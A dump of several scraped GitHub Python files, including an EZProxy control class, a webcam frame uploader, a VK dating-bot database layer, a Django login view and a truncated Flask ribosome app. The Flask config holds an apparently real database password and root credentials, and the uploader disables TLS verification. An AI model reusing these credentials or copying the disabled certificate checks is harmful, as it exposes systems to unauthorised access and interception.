"call"}, {"api_name": "pygame.image", "line_number": 31, "usage_type": "attribute"}]} +{"seq_id": "11884569609", "text": "import json, os\nimport glob\nNewPaths = glob.glob(os.getcwd()+\"/Saves/Slot1/*.json\")\nOGPaths = glob.glob(os.getcwd()+\"/scenes/*.json\")\n\n\n#remove paths from Saves/Slot1\nfor path in NewPaths:\n os.remove(path)\n\nfor path in OGPaths:\n with open(path, 'r') as json_file:\n data = json.load(json_file)\n for gameObject in data[\"sprites\"]:\n if 
gameObject[\"id\"] == \"SceneTrigger\":\n scene_path = gameObject[\"scene_path\"]\n scenePathList = scene_path.split('/')\n fileName = scenePathList[len(scenePathList)-1]\n gameObject[\"scene_path\"] = \"./resources/Saves/Slot1/\"+fileName\n\n # write to saves/slot1\n pathList = path.split('/')\n newpath = os.getcwd()+\"/Saves/Slot1/\"+pathList[len(pathList)-1]\n with open(newpath, 'w') as json_file:\n json.dump(data, json_file, indent=4)\n\n\n\n\n\n\n# data = json.load(json_file)\n# for gameObject in data[\"sprites\"]:\n# gameObject[\"subtype\"] = 2\n#\n#\n# with open (filepath, 'w') as json_file:\n# json.dump(data, json_file, indent=4)", "repo_name": "petertran-21/untitled-ghost-game", "sub_path": "resources/resetScenes.py", "file_name": "resetScenes.py", "file_ext": "py", "file_size_in_byte": 1070, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "glob.glob", "line_number": 3, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 3, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 4, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 4, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 9, "usage_type": "call"}, {"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 23, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "8709982178", "text": "\"\"\"Module for controlling EZProxy server instance\"\"\"\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\nfrom . import stanzas\nfrom .stanzas import StanzaUtil\n\n\nclass EzproxyServer:\n \"\"\"This is a class to represent an Ezproxy server instance\"\"\"\n def __init__(self, hostname, base_dir):\n self.hostname = hostname\n self.base_dir = base_dir\n self.__set_stanzas()\n self.__set_server_options()\n self.auth_cookie = None\n self.pid = None\n\n def __set_stanzas(self):\n with open(self.base_dir + \"/config/databases.conf\", \"r\") as stanza_file:\n self.stanzas = StanzaUtil.parse_stanzas(stanza_file.read())\n\n def __set_server_options(self):\n with open(self.base_dir + \"/config/server.conf\", \"r\") as options_file:\n options_array = []\n options_text = options_file.read()\n for line in options_text.splitlines():\n # Skip empty lines and comments\n if line.strip() and line.startswith(\"#\") is False:\n param = line.strip().split(' ', 1)\n # Force inital letter of key to be uppercase\n key = param[0][:1].upper() + param[0][1:]\n value = param[1].strip()\n options_array.append({key: value})\n self.options = options_array\n\n def login(self, username, password=None):\n \"\"\"Login to an instance of EZProxy\"\"\"\n # Get password from usertext file\n if password is None:\n with open(self.base_dir + \"/user.txt\", \"r\") as auth_file:\n for line in auth_file.readlines():\n if line.strip().startswith(username):\n password = line.split(\":\")[1]\n break\n\n login_url = \"https://login.\" + self.hostname + \"/login\"\n credentials = {\n \"user\": username,\n \"pass\": password\n }\n\n auth = requests.post(\n login_url,\n data=credentials,\n allow_redirects=False\n )\n auth_cookie = {}\n for key in auth.cookies.keys():\n if key.startswith(\"EZProxy\"):\n auth_cookie = {key: auth.cookies.get(key)}\n else:\n Exception(\"No authorized session found\")\n self.auth_cookie = auth_cookie\n self.get_pid()\n return True\n\n def logout(self):\n response = requests.get(\n \"https://\" + self.hostname + 
\"/logout\",\n self.auth_cookie,\n allow_redirects=False\n )\n return response.ok\n\n def get_pid(self):\n \"\"\"Get the current PID of EZProxy\"\"\"\n restart_url = \"https://login.\" + self.hostname + \"/restart\"\n restart_form = requests.get(\n restart_url,\n cookies=self.auth_cookie,\n allow_redirects=False\n )\n pid = BeautifulSoup(restart_form.text, \"html.parser\") \\\n .find_all(attrs={\"name\": \"pid\"})[0] \\\n .attrs[\"value\"]\n self.pid = pid\n\n def restart_ezproxy(self, no_wait=False):\n \"\"\"Restart this instance of EZProxy\"\"\"\n restart_url = \"https://login.\" + self.hostname + \"/restart\"\n restart_payload = {\n \"pid\": self.pid,\n \"confirm\": \"RESTART\"\n }\n\n try:\n restart_request = requests.post(\n restart_url,\n data=restart_payload,\n cookies=self.auth_cookie\n )\n if (BeautifulSoup(restart_request.text, \"html.parser\")\n .h1.next_sibling.strip() ==\n \"EZproxy will restart in 5 seconds.\"):\n if no_wait is False:\n time.sleep(5)\n self.get_pid()\n else:\n RuntimeError(\"Failed to restart server.\")\n except RuntimeError:\n pass\n return self.pid\n\n def get_stanzas(self):\n return self.stanzas\n\n def search_proxy(self, url=None, name=None):\n \"\"\"\n Search proxy instance for existing stanza with origin URL\n \"\"\"\n url_matches = set()\n name_matches = set()\n try:\n for i in range(len(self.get_stanzas())):\n stanza = self.get_stanzas()[i]\n if url:\n for origin in stanza.get_origins():\n if StanzaUtil.match_origin_url(url, origin):\n url_matches.add((i, stanza.name))\n break\n elif name and stanza.name.startswith(name):\n name_matches.add((i, stanza.name))\n\n if bool(url_matches) and bool(name_matches):\n return url_matches & name_matches\n elif bool(url_matches):\n return url_matches\n elif bool(name_matches):\n return name_matches\n\n except (AttributeError, TypeError):\n raise AssertionError(\n f\"Expected a list of Stanzas. 
Got {type(stanzas)}\")\n", "repo_name": "iinuwa/pyezproxy", "sub_path": "pyezproxy/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 5028, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "stanzas.StanzaUtil.parse_stanzas", "line_number": 21, "usage_type": "call"}, {"api_name": "stanzas.StanzaUtil", "line_number": 21, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 53, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 69, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 79, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 84, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 98, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 103, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "stanzas.StanzaUtil.match_origin_url", "line_number": 129, "usage_type": "call"}, {"api_name": "stanzas.StanzaUtil", "line_number": 129, "usage_type": "name"}]} +{"seq_id": "35562544030", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport cv2\nfrom cv2 import VideoWriter_fourcc, VideoWriter\nimport sys\nimport os\nimport requests\nimport v3io_frames as v3f\nimport base64\nimport time\n\n\n# In[ ]:\n\n\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nurl = \"http://%s/%s/%s/\"% (os.getenv('V3IO_WEBAPI'),os.getenv('IGZ_CONTAINER'),os.getenv('RAW_VIDEO_STREAM'))\nheaders = {\n \"Content-Type\": \"application/json\",\n \"X-v3io-function\": \"PutRecords\",\n \"X-v3io-session-key\" : os.getenv(\"V3IO_ACCESS_KEY\")\n }\n\n\n# In[2]:\n\n\ndef stream_frame_write(cameraID,payload):\n bef = time.time()\n r = requests.post(url, headers=headers,json=payload, verify=False) \n time_diff = time.time()-bef\n print(\"Post time %s. 
Response %s\"% (time_diff, r.text))\n return r.text\n\n\n# In[1]:\n\n\ndef start_capture(cameraID: str,\n cameraURL:str,\n shard: int):\n\n # To capture video from webcam.\n cap = cv2.VideoCapture(cameraURL)\n # To use a video file as input\n # cap = cv2.VideoCapture('filename.mp4')\n data_count = 1\n while True:\n\n # Display\n #cv2.imshow('img', img)\n\n fourcc = VideoWriter_fourcc(*'MPEG')\n running_size=0\n Records=[]\n while (cap.isOpened()):\n ret, img = cap.read()\n ret, buffer = cv2.imencode('.jpg', img)\n data = base64.b64encode(buffer)\n Records.append({\n \"Data\": data.decode('utf-8'),\n \"ShardId\" : shard\n })\n if data_count == 60:\n try:\n payload = {\"Records\": Records}\n r = stream_frame_write(cameraID,payload)\n except:\n print(\"Failed to write to shard %s\"% shard)\n data_count = 1\n\n\n # Stop if escape key is pressed\n #k = cv2.waitKey(0) & 0xff\n #if k==27:\n # break\n # Release the VideoCapture object\n cap.release()\n \n\n\n# In[4]:\n\n\ndef get_cameras_list():\n client = v3f.Client(os.getenv('V3IO_FRAMES'),container=os.getenv('IGZ_CONTAINER'))\n df=client.read('kv',os.getenv('CAMERA_LIST_TBL'))\n return df\n\n\n# In[5]:\n\n\ndef init_function():\n cameraID = os.getenv('cameraID')\n shardId = int(os.getenv('shardId'))\n cameraURL = os.getenv('cameraURL')\n \n if isinstance(cameraURL, int):\n cameraURL = int(cameraURL)\n \n cameras_list = get_cameras_list()\n for index, row in get_cameras_list().iterrows():\n if index == cameraID and row['shard'] == shardId and row['url'] == cameraURL and row['active'] == True:\n start_capture(cameraID,cameraURL,shardId)\n print(\"Invalid camera\")\n\n\n# In[ ]:\n\n\ninit_function()\n\n\n# Variables needed for container operations\n# \n# V3IO_ACCESS_KEY\n# \n# V3IO_USERNAME\n# \n# V3IO_WEBAPI\n# \n# V3IO_FRAMES \n# \n# IGZ_CONTAINER\n# \n# RAW_VIDEO_STREAM\n# \n# CAMERA_LIST_TBL\n# \n# shardId\n# \n# cameraID\n# \n# cameraURL\n\n# In[ ]:\n\n\n\n\n", "repo_name": "marcelonyc/iguazioCV", "sub_path": "Clients/dockerized/video_capture.py", "file_name": "video_capture.py", "file_ext": "py", "file_size_in_byte": 3026, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "urllib3.disable_warnings", "line_number": 21, "usage_type": "call"}, {"api_name": "urllib3.exceptions", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 23, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 27, "usage_type": "call"}, {"api_name": "time.time", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 36, "usage_type": "call"}, {"api_name": "time.time", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 64, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 65, "usage_type": "call"}, {"api_name": "v3io_frames.Client", "line_number": 92, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 92, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 93, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 101, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 102, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "71420025473", "text": "import sqlalchemy\nfrom sqlalchemy.orm import 
sessionmaker\nfrom db.models import create_tables\nfrom db.models import UserVKTinder, SearhPair, SearhPairPhoto\nfrom vk_api_my import VKAPIusers\nfrom tokens import Password_db, Login_db, Name_db\n\n\nDSN = f\"postgresql://{Login_db}:{Password_db}@localhost:5432/{Name_db}\"\nengine = sqlalchemy.create_engine(DSN) # create the engine\ncreate_tables(engine) # create the tables\nSession = sessionmaker(bind=engine)\nsession = Session() # create the current session (passed into the functions below as connection)\n\n\ndef add_user(user_id):\n    ''' Adds the current user to the DB'''\n    info_list = VKAPIusers.get_vktinder_user(user_id) # get the app user's data from the VK API by id (the function is called from the vk_api_my module)\n    users = UserVKTinder(user_vk_id=info_list[0]['id'], # convert the user into a UserVKTinder instance\n                         user_vktinder_name=info_list[0]['first_name'],\n                         user_vktinder_surname=info_list[0]['last_name'])\n    session.add(users)\n    session.commit() # commit the changes to the DB\n\n\ndef check_user(connection, user_id):\n    ''' Checks whether the given user is already in the DB'''\n    querys = connection.query(UserVKTinder.user_vk_id).filter(UserVKTinder.user_vk_id == user_id).first()\n    return querys\n\n\ndef add_new(searh_users, user_id):\n    objects_list = []\n    for user in searh_users: # convert each user into a SearhPair instance\n        info = SearhPair(\n            searh_pair_name=user[\"name\"],\n            searh_pair_surname=user[\"surname\"],\n            searh_pair_page_link=user[\"page_link\"],\n            searh_pair_vk_id=user[\"id\"],\n            user_vktinder_id=user_id, # this links the found person to the user who searches for them (one-to-many)\n            attribute=0\n        )\n        objects_list.append(info)\n        session.add_all(objects_list)\n        session.commit()\n        if len(user[\"photo\"]) == 0: # this links the found person to their photos (one-to-many)\n            photo = SearhPairPhoto(searh_pair_id=info.searh_pair_id)\n            objects_list.append(photo)\n        elif len(user[\"photo\"]) == 1:\n            photo = SearhPairPhoto(searh_pair_id=info.searh_pair_id, photo_1=user[\"photo\"][0])\n            objects_list.append(photo)\n        elif len(user[\"photo\"]) == 2:\n            photo = SearhPairPhoto(searh_pair_id=info.searh_pair_id, photo_1=user[\"photo\"][0], photo_2=user[\"photo\"][1])\n            objects_list.append(photo)\n        elif len(user[\"photo\"]) == 3:\n            photo = SearhPairPhoto(searh_pair_id=info.searh_pair_id, photo_1=user[\"photo\"][0], photo_2=user[\"photo\"][1],\n                                   photo_3=user[\"photo\"][2])\n            objects_list.append(photo) \n    session.add_all(objects_list)\n    session.commit() # commit the changes to the DB\n    session.close()\n\n\ndef get_new_searh_pair_info(connection, user_vk_id):\n    '''Gets new candidates after the old ones have been viewed'''\n    querys = connection.query(SearhPair.searh_pair_name, SearhPair.searh_pair_surname, SearhPair.searh_pair_page_link,\n                              SearhPairPhoto.photo_1, SearhPairPhoto.photo_2, SearhPairPhoto.photo_3).join(\n        SearhPair).join(UserVKTinder).filter(UserVKTinder.user_vk_id == user_vk_id, SearhPair.attribute == 0).all()\n\n    return querys\n\n\ndef update_db_attribute(connection, user_vktinder_id, searh_pair_id, attribute):\n    '''Updates the attribute parameter in the DB. 
Takes the DB connection, i.e. the session, the VK ids of both the app user and the person found, and the attribute value:\n    an int: 1 - add to the liked list, 2 - blacklist'''\n    update_searh_pair_id = connection.query(SearhPair.searh_pair_id).join(UserVKTinder).filter(SearhPair.searh_pair_vk_id == searh_pair_id, UserVKTinder.user_vk_id == user_vktinder_id).all()\n    connection.query(SearhPair).filter(SearhPair.searh_pair_id == update_searh_pair_id[0][0]).update({\"attribute\": attribute})\n    session.commit()\n    session.close()\n\ndef get_list_likes_pair(connection, user_vk_id):\n    '''Gets info about the users added to the liked list (those with attribute == 1) for display in the app.\n    Takes the DB connection, i.e. the session, and the VK id of the app user. Returns a list.'''\n    list_likes_pair = connection.query(SearhPair.searh_pair_name, SearhPair.searh_pair_surname, SearhPair.searh_pair_page_link,\n    SearhPairPhoto.photo_1, SearhPairPhoto.photo_2, SearhPairPhoto.photo_3).join(SearhPair).join(UserVKTinder).filter(UserVKTinder.user_vk_id == user_vk_id, SearhPair.attribute == 1).all()\n    return list_likes_pair\n\ndef get_list_blocked_pair(connection, user_vk_id):\n    '''Gets info about the users added to the blocked list (those with attribute == 2) for display in the app.\n    Takes the DB connection, i.e. the session, and the VK id of the app user. Returns a list.'''\n    list_blocked_pair = connection.query(SearhPair.searh_pair_name, SearhPair.searh_pair_surname, SearhPair.searh_pair_page_link,\n    SearhPairPhoto.photo_1, SearhPairPhoto.photo_2, SearhPairPhoto.photo_3).join(SearhPair).join(UserVKTinder).filter(UserVKTinder.user_vk_id == user_vk_id, SearhPair.attribute == 2).all()\n    return list_blocked_pair\n\n", "repo_name": "fomms/vkinder-diploma", "sub_path": "db/db_in_get_info.py", "file_name": "db_in_get_info.py", "file_ext": "py", "file_size_in_byte": 6474, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tokens.Login_db", "line_number": 9, "usage_type": "name"}, {"api_name": "tokens.Password_db", "line_number": 9, "usage_type": "name"}, {"api_name": "tokens.Name_db", "line_number": 9, "usage_type": "name"}, {"api_name": "sqlalchemy.create_engine", "line_number": 10, "usage_type": "call"}, {"api_name": "db.models.create_tables", "line_number": 11, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 12, "usage_type": "call"}, {"api_name": "vk_api_my.VKAPIusers.get_vktinder_user", "line_number": 18, "usage_type": "call"}, {"api_name": "vk_api_my.VKAPIusers", "line_number": 18, "usage_type": "name"}, {"api_name": "db.models.UserVKTinder", "line_number": 19, "usage_type": "call"}, {"api_name": "db.models.UserVKTinder.user_vk_id", "line_number": 28, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder", "line_number": 28, "usage_type": "name"}, {"api_name": "db.models.SearhPair", "line_number": 35, "usage_type": "call"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 47, "usage_type": "call"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 50, "usage_type": "call"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 53, "usage_type": "call"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 56, "usage_type": "call"}, {"api_name": "db.models.UserVKTinder", "line_number": 68, "usage_type": "argument"}, {"api_name": "db.models.SearhPair", "line_number": 68, 
"usage_type": "argument"}, {"api_name": "db.models.SearhPair.searh_pair_name", "line_number": 66, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair", "line_number": 66, "usage_type": "name"}, {"api_name": "db.models.SearhPair.searh_pair_surname", "line_number": 66, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair.searh_pair_page_link", "line_number": 66, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto.photo_1", "line_number": 67, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 67, "usage_type": "name"}, {"api_name": "db.models.SearhPairPhoto.photo_2", "line_number": 67, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto.photo_3", "line_number": 67, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder.user_vk_id", "line_number": 68, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair.attribute", "line_number": 68, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder", "line_number": 76, "usage_type": "argument"}, {"api_name": "db.models.SearhPair.searh_pair_id", "line_number": 76, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair", "line_number": 76, "usage_type": "name"}, {"api_name": "db.models.SearhPair.searh_pair_vk_id", "line_number": 76, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder.user_vk_id", "line_number": 76, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair", "line_number": 77, "usage_type": "argument"}, {"api_name": "db.models.SearhPair.searh_pair_id", "line_number": 77, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder", "line_number": 85, "usage_type": "argument"}, {"api_name": "db.models.SearhPair", "line_number": 85, "usage_type": "argument"}, {"api_name": "db.models.SearhPair.searh_pair_name", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair", "line_number": 84, "usage_type": "name"}, {"api_name": "db.models.SearhPair.searh_pair_surname", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair.searh_pair_page_link", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto.photo_1", "line_number": 85, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 85, "usage_type": "name"}, {"api_name": "db.models.SearhPairPhoto.photo_2", "line_number": 85, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto.photo_3", "line_number": 85, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder.user_vk_id", "line_number": 85, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair.attribute", "line_number": 85, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder", "line_number": 92, "usage_type": "argument"}, {"api_name": "db.models.SearhPair", "line_number": 92, "usage_type": "argument"}, {"api_name": "db.models.SearhPair.searh_pair_name", "line_number": 91, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair", "line_number": 91, "usage_type": "name"}, {"api_name": "db.models.SearhPair.searh_pair_surname", "line_number": 91, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair.searh_pair_page_link", "line_number": 91, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto.photo_1", "line_number": 92, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 92, "usage_type": "name"}, {"api_name": "db.models.SearhPairPhoto.photo_2", "line_number": 92, "usage_type": "attribute"}, 
{"api_name": "db.models.SearhPairPhoto.photo_3", "line_number": 92, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder.user_vk_id", "line_number": 92, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair.attribute", "line_number": 92, "usage_type": "attribute"}]} +{"seq_id": "22761310094", "text": "from django.shortcuts import render, redirect\nfrom chaapp.forms import PostForm\nfrom django.contrib.auth import authenticate\nfrom django.contrib import auth\n\n# Create your views here.\n\ndef index(request):\n if request.method == 'POST':\n postform = PostForm(request.POST)\n if postform.is_valid():\n username = postform.cleaned_data['username']\n pd = postform.cleaned_data['pd']\n userauth = authenticate(username=username, password=pd)\n\n if userauth is not None:\n auth.login(request, userauth)\n postform = PostForm()\n return redirect('/manage/')\n else:\n massage = '登入失敗!'\n else:\n message = '驗證碼錯誤!'\n else:\n message = '帳號、密碼及驗證碼都必須輸入!'\n postform = PostForm()\n return render(request, 'index.jinja', locals())\n\ndef manage(request):\n return render(request, 'manage.jinja', locals())", "repo_name": "NeonEDuck/chaapp", "sub_path": "chaapp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "chaapp.forms.PostForm", "line_number": 10, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 14, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 17, "usage_type": "call"}, {"api_name": "django.contrib.auth", "line_number": 17, "usage_type": "name"}, {"api_name": "chaapp.forms.PostForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 19, "usage_type": "call"}, {"api_name": "chaapp.forms.PostForm", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "25181166915", "text": "import cv2\nimport numpy as np\n\n\ndef tensor2cvimg(src):\n '''return np.array\n uint8\n [0, 255]\n BGR\n (H, W, C)\n '''\n out = src.copy() * 255\n out = out.transpose((1, 2, 0)).astype(np.uint8)\n out = cv2.cvtColor(out, cv2.COLOR_RGB2BGR)\n\n return out\n\ndef cvimg2tensor(src):\n out = src.copy()\n out = cv2.cvtColor(out, cv2.COLOR_BGR2RGB)\n out = out.transpose((2,0,1)).astype(np.float64)\n out = out / 255\n\n return out\n", "repo_name": "akmtn/pytorch-siggraph2017-inpainting", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 469, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 184, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.uint8", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "760260152", "text": "import collections as coll\nimport csv\nfrom collections import OrderedDict, defaultdict\nfrom copy import deepcopy\nfrom flask import Flask, json, jsonify, render_template, render_template_string, 
request, session\nfrom sqlalchemy import tuple_\nfrom flask_bootstrap import Bootstrap\nfrom flask_sqlalchemy import SQLAlchemy\nimport numpy as np\nimport itertools\nfrom itertools import combinations, groupby\nimport random\nimport time\nimport math\nfrom numpy import nan\nimport StringIO\nfrom definitions import ribosome_subunits\n# import scipy\n\nnp.set_printoptions(threshold=np.nan)\n# from sqlalchemy.sql.expression import case\nfrom sqlalchemy import case\n\n# from sqlalchemy.orm import relationship\n# from models import UnitCorrespondence\n# from flask_marshmallow import Marshmallow\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://webfr3d:nrw0FhuKwY2CUYa2TDPU@localhost/rna3dhub-prod'\napp.config[\n 'SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:root@127.0.0.1/rna3dhub?unix_socket=/Applications/MAMP/tmp/mysql/mysql.sock'\nBootstrap(app)\ndb = SQLAlchemy(app)\n\nfrom models import *\nfrom discrepancy import *\nfrom greedyInsertion import *\nfrom process_input import *\nfrom ordering import *\nfrom queries import *\n\n\n@app.route('/')\ndef home():\n # Debug statement\n return render_template(\"home.html\")\n\n\n@app.route('/correspondence')\ndef correspondence():\n # chain_info = '|'.join(unitid.split('|')[:3])\n # print chain_info\n\n annotation = [('4V4Q|1|AA', 'Empty', 'NO', '-', '-'), ('4V4Q|1|CA', 'Empty', 'NO', '-', '-'),\n ('4V50|1|AA', 'P-site of SSU only', 'NO', '-', '-'),\n ('4V50|1|CA', 'P-site of SSU only', 'NO', '-', '-'), ('4V5B|1|BA', 'Empty', 'NO', '-', '-'),\n ('4V5B|1|DA', 'Empty', 'NO', '-', '-'),\n ('4V9D|1|AA', 'P/E', 'Ribosome Recycling (early intermediate)', 'RRF (AY)', '-'),\n ('4V9D|1|BA', 'P/P', 'Posttermination', 'none', '-'),\n ('4V9O|1|BA', 'Empty', 'Elongation - pretranslocation', 'EF-G (BV)', 'Viomycin (BW)'),\n ('4V9O|1|DA', 'Empty', 'Elongation - pretranslocation', 'EF-G (DV)', 'Viomycin (DW)'),\n ('4V9O|1|FA', 'Empty', 'Elongation - pretranslocation', 'EF-G (FV)', 'Viomycin (FW)'),\n ('4V9O|1|HA', 'Empty', 'Elongation - pretranslocation', 'EF-G (HV)', 'Viomycin (HW)'),\n ('4V9P|1|BA', 'Empty', 'Elongation - pretranslocation', 'EF-G (BV)', 'Viomycin (BW)'),\n ('4V9P|1|DA', 'Empty', 'Elongation - pretranslocation', 'EF-G (DV)', 'Viomycin (DW)'),\n ('4V9P|1|FA', 'Empty', 'Elongation - pretranslocation', 'EF-G (FV)', 'Viomycin (FW)'),\n ('4V9P|1|HA', 'Empty', 'Elongation - pretranslocation', 'EF-G (HV)', '-'),\n ('4YBB|1|AA', 'Empty', 'NO', '-', '-'), ('4YBB|1|BA', 'Empty', 'NO', '-', '-'),\n ('5IT8|1|AA', 'Empty', 'NO', '-', '-'), ('5IT8|1|BA', 'Empty', 'NO', '-', '-'),\n ('5J5B|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (AA)'),\n ('5J5B|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (BA)'),\n ('5J7L|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (AA)'),\n ('5J7L|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (BA)'),\n ('5J88|1|AA', 'Empty', 'NO', '-', '-'), ('5J88|1|BA', 'Empty', 'NO', '-', '-'),\n ('5J8A|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (AA)'),\n ('5J8A|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (BA)'),\n ('5J91|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (AA)'),\n ('5J91|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (BA)'),\n ('5JC9|1|AA', 'Empty', 'NO', '-', '-'), ('5JC9|1|BA', 'Empty', 'NO', '-', '-'),\n ('5MDZ|1|2', 'P-site ', 'NO', '-', '-'), ('6BU8|1|A', 'Appears to be A/A, P/P, E/E ', 'NO', '-', '-'),\n ('6GWT|1|a', 'P/RF1 ', 'Termination', 'RF1 (v), 
RF3 (w)', 'Apidaecin (z)'),\n ('6GXM|1|a', 'P/RF1 ', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6GXN|1|a', 'P/RF1', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6GXO|1|a', 'P/E', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6I7V|1|AA', 'Empty', 'Ribosome heterogeneity ', '-', '-'),\n ('6I7V|1|BA', 'Empty', 'Ribosome heterogeneity ', '-', '-'),\n ('4U1U|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Quinupristin (B6)'),\n ('4U1U|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Quinupristin (D6)'),\n ('4U1V|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Linopristin (B6)'),\n ('4U1V|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Linopristin (D6)'),\n ('4U20|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (BA)'),\n ('4U20|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (DA)'),\n ('4U24|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (BA)'),\n ('4U24|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (DA)'),\n ('4U25|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Virginiamycin (BA)'),\n ('4U25|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Virginiamycin (DA)'),\n 